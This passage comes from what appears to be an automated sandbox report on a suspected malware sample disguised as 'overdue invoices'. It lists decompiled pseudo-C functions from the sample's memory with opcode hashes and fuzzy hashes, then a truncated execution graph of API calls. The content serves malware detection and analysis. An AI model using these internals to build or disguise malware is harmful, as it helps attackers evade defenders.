					return 0x7ffe0030;
				}
			}




                  0x009aaab6
                  0x009aaabb
                  0x009fa442
                  0x00000000
                  0x009fa448
                  0x009fa454
                  0x009fa454
                  0x009aaac1
                  0x009aaac1
                  0x009aaac6
                  0x009aaac6

                  Memory Dump Source
                  • Source File: 00000001.00000002.443244927.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_970000_overdue invoices.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                  • Instruction ID: a917054d6b1e3ec03e2c24031b03922899211324f421f7122bcf6e6cdeb21ed4
                  • Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                  • Instruction Fuzzy Hash: CED0C935352A80CFD616CF0CC554B1533A8BB04B40FC50490E500CB761E72CDD40CA00
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00A1A537 Relevance: .0, Instructions: 11COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00A1A537(intOrPtr _a4, intOrPtr _a8) {

				return L009B8E10( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a8, _a4);
			}



                  0x00a1a553

                  Memory Dump Source
                  • Source File: 00000001.00000002.443244927.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_970000_overdue invoices.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                  • Instruction ID: 35f2430c2bd152993c34a7d662245a9ae50abeeee517f3fd3aa05f2482b88508
                  • Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                  • Instruction Fuzzy Hash: EEC01232080248BBCB127E81CD02F467B2AEB98B60F008010BA080A5618A32E970EA84
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0099DB40 Relevance: .0, Instructions: 11COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E0099DB40() {
				signed int* _t3;
				void* _t5;

				_t3 = L009B4620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x64);
				if(_t3 == 0) {
					return 0;
				} else {
					 *_t3 =  *_t3 | 0x00000400;
					return _t3;
				}
			}





                  0x0099db4d
                  0x0099db54
                  0x0099db5f
                  0x0099db56
                  0x0099db56
                  0x0099db5c
                  0x0099db5c

                  Memory Dump Source
                  • Source File: 00000001.00000002.443244927.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_970000_overdue invoices.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                  • Instruction ID: 3056228f72fa91650df9b6b1702d0e977b3db6bdb0d3d38bb43b4ad1aed6d667
                  • Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                  • Instruction Fuzzy Hash: BCC08C30291A00AAEB221F20CE02B4037A4BB41B01F4500A07300DA0F1DB78DC01E600
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0099AD30 Relevance: .0, Instructions: 10COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E0099AD30(intOrPtr _a4) {

				return L009B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}



                  0x0099ad49

                  Memory Dump Source
                  • Source File: 00000001.00000002.443244927.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_970000_overdue invoices.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                  • Instruction ID: aec2252c7079f643f9278756edbc76928b539457a9774936b877f857e868487a
                  • Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                  • Instruction Fuzzy Hash: 89C08C32080288BBC7126A85CE41F01BB29E7D0B60F000020B6040A6628932E860D588
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 009C36CC Relevance: .0, Instructions: 10COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E009C36CC(void* __ecx) {

				if(__ecx > 0x7fffffff) {
					return 0;
				} else {
					return L009B4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
			}



                  0x009c36d2
                  0x009c36e8
                  0x009c36d4
                  0x009c36e5
                  0x009c36e5

                  Memory Dump Source
                  • Source File: 00000001.00000002.443244927.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_970000_overdue invoices.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                  • Instruction ID: f8ca358c008d2a8df8dc7de2f18cb117ee83fa8f7ad2e591b28d90d075dcf9b5
                  • Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                  • Instruction Fuzzy Hash: ABC02B70150440FBD7152F30CF02F147358F740B71F6403587220454F1D5289C00E100
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 009A76E2 Relevance: .0, Instructions: 10COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E009A76E2(void* __ecx) {
				void* _t5;

				if(__ecx != 0 && ( *(__ecx + 0x20) & 0x00000040) == 0) {
					return L009B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
				return _t5;
			}




                  0x009a76e4
                  0x00000000
                  0x009a76f8
                  0x009a76fd

                  Memory Dump Source
                  • Source File: 00000001.00000002.443244927.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_970000_overdue invoices.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                  • Instruction ID: e79feef1f9d66ff41f91d19157ae3367bff7e026872f3fd1f4e6286303ab169f
                  • Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                  • Instruction Fuzzy Hash: D1C08C701499C05AEB2A5788CE22B20B658AB49708F480A9CBA010D4A2C368AC02C248
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 009B3A1C Relevance: .0, Instructions: 10COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E009B3A1C(intOrPtr _a4) {
				void* _t5;

				return L009B4620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}




                  0x009b3a35

                  Memory Dump Source
                  • Source File: 00000001.00000002.443244927.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_970000_overdue invoices.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                  • Instruction ID: 1199e318f3737365a94f2bb8ef6f7699f073df572f77e596a79d7bd8c742d9af
                  • Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                  • Instruction Fuzzy Hash: F3C04C32180648BBC7126E85DD01F557B69E795B60F154021B6040A5628576ED61E598
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 009B7D50 Relevance: .0, Instructions: 7COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E009B7D50() {
				intOrPtr* _t3;

				_t3 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t3 != 0) {
					return  *_t3;
				} else {
					return _t3;
				}
			}




                  0x009b7d56
                  0x009b7d5b
                  0x009b7d60
                  0x009b7d5d
                  0x009b7d5d
                  0x009b7d5d

                  Memory Dump Source
                  • Source File: 00000001.00000002.443244927.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_970000_overdue invoices.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                  • Instruction ID: eb5cd6ffbea27b6d70f4e555201296a6dfe0a59f50f092ea494d4555978b25b2
                  • Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                  • Instruction Fuzzy Hash: B6B092343019408FCF16DF18C180B5573E8BB84B80B8400D4E400CBA20D229E8008900
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 009C2ACB Relevance: .0, Instructions: 5COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E009C2ACB() {
				void* _t5;

				return E009AEB70(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
			}




                  0x009c2adc

                  Memory Dump Source
                  • Source File: 00000001.00000002.443244927.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_970000_overdue invoices.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                  • Instruction ID: b411afb05b5d9607ba257c32599f6f775a03efad7c7dc608f681e2d139e936f6
                  • Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                  • Instruction Fuzzy Hash: AEB01232C11440CFCF02EF40C620B197331FB40750F054490A00127931C228AC01CB80
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 009D98A0 Relevance: .0, Instructions: 4COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000001.00000002.443244927.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_970000_overdue invoices.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: ef33b4a972ffe4d3f56f839afb52c82997245957da713689b356d0912330959d
                  • Instruction ID: ed403023fb1c7e8ef494573af84d5d4fb739200afd1d31f7ac1cf42dea0c181c
                  • Opcode Fuzzy Hash: ef33b4a972ffe4d3f56f839afb52c82997245957da713689b356d0912330959d
                  • Instruction Fuzzy Hash: 2C90026130214402D213615A44146160149D7D13C5FA1C022E5814555D86658D53F172
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 009D9820 Relevance: .0, Instructions: 4COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000001.00000002.443244927.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_970000_overdue invoices.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: ac48d1ce9a8224369a56ad19bc9c11909a98560b88a9a0e50f29fcce495929c8
                  • Instruction ID: 642aea77ea14e52028a9c1a515f1856b4064e4d67dba59ec62c834e0afc6a612
                  • Opcode Fuzzy Hash: ac48d1ce9a8224369a56ad19bc9c11909a98560b88a9a0e50f29fcce495929c8
                  • Instruction Fuzzy Hash: A190027124214402D252715A44046160149A7D03C1FA1C022A4814554E86958E56FAA1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 009DB040 Relevance: .0, Instructions: 4COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000001.00000002.443244927.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_970000_overdue invoices.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: e8954b35236ab22bdb567aebd88c0e7c12c1e0fef654a6268f343d812ba18cc3
                  • Instruction ID: 80315188bbe52cb799c96962d400d2d22f95844abadf0a4166469f5f1a4d7f3b
                  • Opcode Fuzzy Hash: e8954b35236ab22bdb567aebd88c0e7c12c1e0fef654a6268f343d812ba18cc3
                  • Instruction Fuzzy Hash: B49002A1602280434651B15A48044165155A7E13813A1C131A4844560C86A88C55E2A5
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 009D99D0 Relevance: .0, Instructions: 4COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000001.00000002.443244927.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_970000_overdue invoices.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 263f8443fd83a2d9cb7914777d21e3316c3a17885ca75682073491f551f6d3f2
                  • Instruction ID: d0db1b20daa3a74abe98e8fa8a304560ff7c694ca990676759f86c56d2600e90
                  • Opcode Fuzzy Hash: 263f8443fd83a2d9cb7914777d21e3316c3a17885ca75682073491f551f6d3f2
                  • Instruction Fuzzy Hash: DA9002A121214042D215615A4404716018597E1381F61C022A6544554CC5698C61A165
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 009D95F0 Relevance: .0, Instructions: 4COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000001.00000002.443244927.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_970000_overdue invoices.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: cd79e5967df4ed96f2d00a55cb10f2d6912279fc22f74527c5246ad692be2bc7
                  • Instruction ID: fb845b4653cce9ed44b90d97e7ce09dce98a6904437fa4d32659a46e9fe1af47
                  • Opcode Fuzzy Hash: cd79e5967df4ed96f2d00a55cb10f2d6912279fc22f74527c5246ad692be2bc7
                  • Instruction Fuzzy Hash: AB90027120214802D215615A4804696014597D0381F61C021AA414655E96A58C91B171
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 009DAD30 Relevance: .0, Instructions: 4COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000001.00000002.443244927.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_970000_overdue invoices.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 30eba1ea1a49aafdba698d782371158642c603fa155bd3e9c4c3cb34fc38a995
                  • Instruction ID: 4d8c44683522fc3dfd257e13f6ad949c69dd925fda80af8c35b59d58441d3dd4
                  • Opcode Fuzzy Hash: 30eba1ea1a49aafdba698d782371158642c603fa155bd3e9c4c3cb34fc38a995
                  • Instruction Fuzzy Hash: 90900271A06140129251715A48146564146A7E07C1B65C021A4904554C89948E55A3E1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 009D9520 Relevance: .0, Instructions: 4COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000001.00000002.443244927.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_970000_overdue invoices.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 5d6cb21e408c63f63d5473f893cdf26ad5c3ba6ed2c61e6cc0cab51d0783e5ef
                  • Instruction ID: ced2f8239e372936653ca9c34500bfd6c125cad5e50eb0137ef8b63318a1bb3a
                  • Opcode Fuzzy Hash: 5d6cb21e408c63f63d5473f893cdf26ad5c3ba6ed2c61e6cc0cab51d0783e5ef
                  • Instruction Fuzzy Hash: 939002E1202280924611A25A8404B1A464597E0381B61C026E5444560CC5658C51E175
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 009D9950 Relevance: .0, Instructions: 4COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000001.00000002.443244927.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_970000_overdue invoices.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: e60c8d185a38353021dcb73ecc33dd4e384a137bccc8b8715694fb40f377c448
                  • Instruction ID: 087d1ee30ad4779738776707a9ad304cfbfec0f55e504892bb896a682a5d60e8
                  • Opcode Fuzzy Hash: e60c8d185a38353021dcb73ecc33dd4e384a137bccc8b8715694fb40f377c448
                  • Instruction Fuzzy Hash: 0F9002A120254403D251655A4804617014597D0382F61C021A6454555E8A698C51B175
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 009D9560 Relevance: .0, Instructions: 4COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000001.00000002.443244927.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_970000_overdue invoices.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 9293b0c567ce8d6dcabe4577ffd2fc3dcc8636ebb6592b455007bfa61064c7be
                  • Instruction ID: 11ffcc4ee52aeee07b3093bb2453fd1559df86f304da06b4f7b6b944fe773901
                  • Opcode Fuzzy Hash: 9293b0c567ce8d6dcabe4577ffd2fc3dcc8636ebb6592b455007bfa61064c7be
                  • Instruction Fuzzy Hash: 24900265222140020256A55A060451B0585A7D63D13A1C025F5806590CC6618C65A361
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 009D9A80 Relevance: .0, Instructions: 4COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000001.00000002.443244927.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_970000_overdue invoices.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 1f23bc152f3585e516be0f51d49f9bed269dd7a5a5b5cada4a4f33983476604c
                  • Instruction ID: 1d078d8ad77504a15cdf081bc6878710b999da75dbd82cfe0a6e26aa7d3ad4ca
                  • Opcode Fuzzy Hash: 1f23bc152f3585e516be0f51d49f9bed269dd7a5a5b5cada4a4f33983476604c
                  • Instruction Fuzzy Hash: 0990026120258442D251625A4804B1F424597E1382FA1C029A8546554CC9558C55A761
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 009D96D0 Relevance: .0, Instructions: 4COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000001.00000002.443244927.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_970000_overdue invoices.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 1df292194f415b54a20a2cd88b300eb21d05835286ab189dd79c72fc0bf6bc25
                  • Instruction ID: f6bbe250fe7b07be2ec19043eea7ad9f1b1e80069089951e9171b76e04fc7182
                  • Opcode Fuzzy Hash: 1df292194f415b54a20a2cd88b300eb21d05835286ab189dd79c72fc0bf6bc25
                  • Instruction Fuzzy Hash: CE90027120214842D211615A4404B56014597E0381F61C026A4514654D8655CC51B561
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 009D9A10 Relevance: .0, Instructions: 4COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000001.00000002.443244927.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_970000_overdue invoices.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 4a57d88bb9a5f6b0dac2c5e87f4a049bf5f6918167d9cf9cfbd85f717390497f
                  • Instruction ID: 7a7c7c5563c75e3696fe8c927bd2dc942b0a7f833eb9adf2b2ee856ea88e72ba
                  • Opcode Fuzzy Hash: 4a57d88bb9a5f6b0dac2c5e87f4a049bf5f6918167d9cf9cfbd85f717390497f
                  • Instruction Fuzzy Hash: 8A90027120254402D211615A4808757014597D0382F61C021A9554555E86A5CC91B571
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 009D9610 Relevance: .0, Instructions: 4COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000001.00000002.443244927.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_970000_overdue invoices.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 02ac9c711f3644ee7e1dfbc3b7966b0955cf863e86e13f63d828cf34592fe601
                  • Instruction ID: 993f40ad9a1477f7234e2e019c5cb11e40bb540ffb703efb7dc228099dec1fdb
                  • Opcode Fuzzy Hash: 02ac9c711f3644ee7e1dfbc3b7966b0955cf863e86e13f63d828cf34592fe601
                  • Instruction Fuzzy Hash: FF90027160614802D261715A4414756014597D0381F61C021A4414654D87958E55B6E1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 009DA3B0 Relevance: .0, Instructions: 4COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000001.00000002.443244927.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_970000_overdue invoices.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 84545cd4aeedc4ef23bf99d8ada4f8a82d298225ece2f5941e1d241395f67288
                  • Instruction ID: c8bf54a316f4bdde13ab6c4db1985b51c4c89a7d7204f0fb4a973feccf6103a8
                  • Opcode Fuzzy Hash: 84545cd4aeedc4ef23bf99d8ada4f8a82d298225ece2f5941e1d241395f67288
                  • Instruction Fuzzy Hash: 3290027120258002D251715A844461B5145A7E0381F61C421E4815554C86558C56E261
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 009D9B00 Relevance: .0, Instructions: 4COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000001.00000002.443244927.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_970000_overdue invoices.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 25dad22841eea99ce02de5a5b3123f0bd10d8a4f54256d6a74d5f200f0f367f2
                  • Instruction ID: 8db94153eb7307318d813bc01751a81a8029d188667535e73facb8665319ae64
                  • Opcode Fuzzy Hash: 25dad22841eea99ce02de5a5b3123f0bd10d8a4f54256d6a74d5f200f0f367f2
                  • Instruction Fuzzy Hash: 3590026124214802D251715A84147170146D7D0781F61C021A4414554D86568D65B6F1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00A2FDDA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                  Download Yara Rule
                  C-Code - Quality: 53%
                  			E00A2FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E009DCE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				L00A25720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return L00A25720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                  0x00a2fdda
                  0x00a2fde2
                  0x00a2fde5
                  0x00a2fdec
                  0x00a2fdfa
                  0x00a2fdff
                  0x00a2fe0a
                  0x00a2fe0f
                  0x00a2fe17
                  0x00a2fe1e
                  0x00a2fe19
                  0x00a2fe19
                  0x00a2fe19
                  0x00a2fe20
                  0x00a2fe21
                  0x00a2fe22
                  0x00a2fe25
                  0x00a2fe40

                  APIs
                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A2FDFA
                  Strings
                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 00A2FE01
                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 00A2FE2B
                  Memory Dump Source
                  • Source File: 00000001.00000002.443244927.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_970000_overdue invoices.jbxd
                  Similarity
                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                  • API String ID: 885266447-3903918235
                  • Opcode ID: d4bca438cd9f6cd2cc0acefde1c894bfd3c0892d53b4502edb0400a0b9b3e780
                  • Instruction ID: f4d6d559cb06619944ce20de26c6e356124c7c8901800a09c0d7084d2855e4a9
                  • Opcode Fuzzy Hash: d4bca438cd9f6cd2cc0acefde1c894bfd3c0892d53b4502edb0400a0b9b3e780
                  • Instruction Fuzzy Hash: D5F0FC725405117FD6211B59DD02F337B6AEB84730F154325F614555E1D962FC2097F0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Execution Graph

                  Execution Coverage:6.4%
                  Dynamic/Decrypted Code Coverage:1.6%
                  Signature Coverage:0%
                  Total number of Nodes:865
                  Total number of Limit Nodes:97
                  execution_graph 23261 3369540 LdrInitializeThunk 23263 29ad49d 23266 29a9c80 23263->23266 23275 29aa140 23266->23275 23268 29a9ca6 23282 2998b60 23268->23282 23270 29a9cb2 23271 29a9cd6 23270->23271 23290 2997e40 23270->23290 23323 29a8930 23271->23323 23276 29aa14a 23275->23276 23277 29aa171 23275->23277 23276->23268 23326 29a8800 LdrLoadDll 23276->23326 23277->23268 23279 29aa1cc 23279->23268 23280 29aa1b8 23280->23279 23327 29a8800 LdrLoadDll 23280->23327 23328 2998ab0 23282->23328 23284 2998b6d 23285 2998b74 23284->23285 23346 2998a50 23284->23346 23285->23270 23291 2997e67 23290->23291 23292 29aa140 LdrLoadDll 23290->23292 23848 299a010 23291->23848 23292->23291 23294 2997e79 23855 2999d60 23294->23855 23296 2997e96 23303 2997e9d 23296->23303 23927 2999c90 LdrLoadDll 23296->23927 23299 2997f06 23300 29aa270 2 API calls 23299->23300 23320 2997fe4 23299->23320 23301 2997f1c 23300->23301 23302 29aa270 2 API calls 23301->23302 23304 2997f2d 23302->23304 23303->23320 23860 299d170 23303->23860 23305 29aa270 2 API calls 23304->23305 23306 2997f3e 23305->23306 23873 299aed0 23306->23873 23308 2997f51 23309 29a3a50 8 API calls 23308->23309 23310 2997f62 23309->23310 23311 29a3a50 8 API calls 23310->23311 23312 2997f73 23311->23312 23313 2997f93 23312->23313 23895 299ba40 23312->23895 23315 29a3a50 8 API calls 23313->23315 23322 2997fdb 23313->23322 23319 2997faa 23315->23319 23319->23322 23929 299bae0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 23319->23929 23320->23271 23902 2997c70 23322->23902 23324 29a91e0 LdrLoadDll 23323->23324 23325 29a894f 23324->23325 23326->23280 23327->23280 23366 29a6e50 23328->23366 23332 2998ad6 23332->23284 23333 2998acc 23333->23332 23379 29a98f0 23333->23379 23337 2998b13 23337->23332 23398 29988d0 23337->23398 23339 2998b33 23410 2998250 LdrLoadDll 23339->23410 23341 2998b39 23411 29984b0 LdrLoadDll 23341->23411 23343 2998b3f 23412 2998320 LdrLoadDll 23343->23412 23345 2998b45 23345->23284 23816 29a9820 23346->23816 23349 29a9820 LdrLoadDll 23350 2998a7b 23349->23350 23351 29a9820 LdrLoadDll 23350->23351 23352 2998a91 23351->23352 23353 299cf70 23352->23353 23354 29aa140 LdrLoadDll 23353->23354 23355 299cf89 23354->23355 23826 2999e90 23355->23826 23357 299cf9c 23835 29a8460 23357->23835 23361 299cfc2 23362 299cfed 23361->23362 23841 29a84e0 23361->23841 23364 29a8710 2 API calls 23362->23364 23365 